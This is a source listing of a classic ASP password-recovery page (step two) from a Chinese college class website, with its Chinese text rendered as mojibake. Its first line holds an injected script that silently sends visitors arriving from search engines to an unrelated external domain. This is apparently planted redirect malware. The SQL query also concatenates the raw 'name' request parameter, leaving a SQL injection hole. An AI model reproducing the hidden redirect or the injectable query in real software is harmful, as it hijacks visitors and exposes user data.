d:\wwwroot\wuchunhua\ͨѶ¼\wjmm\wjmm2.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!-- #include file="conn.asp" -->
002:
<%
003:
name=Trim(Request("name"))
004:
set rs=server.createobject("adodb.recordset")
005:
sql="select * from [user] where name='" + name + "'"
006:
rs.open sql,conn,1,3
007:
If rs.bof or rs.eof Then
008:
Response.Redirect "../error.asp?id=ûÓÐÕâ¸öÓû§ÐÅÏ¢£¡"
009:
End If
010:
%
>
011:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
012:
"http://www.w3.org/TR/html4/loose.dtd">
013:
<html>
014:
<head>
015:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
016:
<link href="../css.css" rel="stylesheet" type="text/css">
017:
<title>ÆëÆë¹þ¶ûְҵѧԺ ¼ÆÈí052--ÕÒ»ØÃÜÂë</title>
018:
<style type="text/css">
019:
<!--
020:
body {
021:
background-image: url('../pic/xian.jpg');
022:
}
023:
.ziti {
024:
font-family: "ËÎÌå";
025:
font-size: 12px;
026:
font-weight: normal;
027:
color: #000000;
028:
}
029:
.ziti1 {
030:
font-size: 12px;
031:
font-weight: normal;
032:
color: #FF0000;
033:
}
034:
.style2 {
035:
font-size: 1pt;
036:
color: #FFFFFF;
037:
}
038:
.ziti2 { font-family: "ËÎÌå";
039:
font-size: 12px;
040:
font-weight: bold;
041:
color: #FFFFFF;
042:
}
043:
.tishi { font-family: "ËÎÌå";
044:
font-size: 12px;
045:
color: #FF0000;
046:
}
047:
.ziti3 { font-family: "ËÎÌå";
048:
font-size: 12px;
049:
color: #000000;
050:
}
051:
.ziti11 { font-size: 12px;
052:
font-weight: normal;
053:
color: #000000;
054:
}
055:
-->
056:
</style></head>
057:
<body>
058:
<table width="775" border="0" align="center" cellpadding="0" cellspacing="0">
059:
<tr>
060:
<th scope="col"><img src="../pic/toplogo.jpg" width="775" height="80"></th>
061:
</tr>
062:
<tr>
063:
<td height="2"><span class="style2">1</span></td>
064:
</tr>
065:
<tr>
066:
<td height="20" background="../pic/tiao1.gif"><table width="775" border="0" cellpadding="0" cellspacing="0">
067:
<tr class="ziti2">
068:
<th width="97" scope="col">Ê×Ò³</th>
069:
<th width="97" scope="col">Ïà²á</th>
070:
<th width="97" scope="col">ÁôÑÔ±¾</th>
071:
<th width="97" scope="col">ÐíÔ¸°å</th>
072:
<th width="97" scope="col">ÇÄÇÄ»°</th>
073:
<th width="97" scope="col"><a href="#" name="link1" id="link1" onMouseOver="MM_showMenu(window.mm_menu_1122195914_0,0,12,null,'link1')" onMouseOut="MM_startTimeout();">×ÊÁÏÏ»</a></th>
074:
<th width="97" scope="col">¹ÜÀí</th>
075:
<th width="97" scope="col">怫</th>
076:
</tr>
077:
</table></td>
078:
</tr>
079:
<tr>
080:
<td height="53">
081:
<form action="wjmm3.asp" method="post">
082:
<table width="775" height="93" border="0" cellpadding="0" cellspacing="0">
083:
<tr class="ziti11">
084:
<th width="380" scope="col">²½Öè¶þ£º</th>
085:
<th width="395" scope="col">¡¡</th>
086:
</tr>
087:
<tr class="ziti11">
088:
<td>
089:
<p align="right">ÐÕ Ãû£º</td>
090:
<td>
<%
=rs("name")
%
> <input type="hidden" name="name" value="
<%
=rs("name")
%
>"> </td>
091:
</tr>
092:
<tr class="ziti11">
093:
<td><div align="right">ÃÜÂëÌáʾÎÊÌ⣺</div></td>
094:
<td>
<%
=rs("pwdquestion")
%
></td>
095:
</tr>
096:
<tr class="ziti11">
097:
<td><div align="right">´ð °¸£º</div></td>
098:
<td><input type="text" name="ans" size="12" tabindex="1"></td>
099:
</tr>
100:
<tr class="ziti11">
101:
<td colspan="2"><div align="center">
102:
<input type="submit" name="b1" tabindex="2" value="ÏÂÒ»²½">
103:
</div></td>
104:
</tr>
105:
</table>
106:
</form>
107:
108:
</td>
109:
</tr>
110:
</table>
111:
<table width="775" border="0" align="center" cellpadding="0" cellspacing="0">
112:
<tr>
113:
<th scope="col"><hr>
114:
<span class="ziti11">°æÈ¨ËùÓÐ © ÆëÆë¹þ¶ûְҵѧԺ¼ÆËã»úÈí¼þ052°à</span></th>
115:
</tr>
116:
</table>
117:
<br>
118:
<br>
119:
<br>
120:
121:
<p>¡¡</p>
122:
</body>
123:
</html>
124:
<%
125:
rs.Close
126:
Set rs=nothing
127:
%
>
128:
129: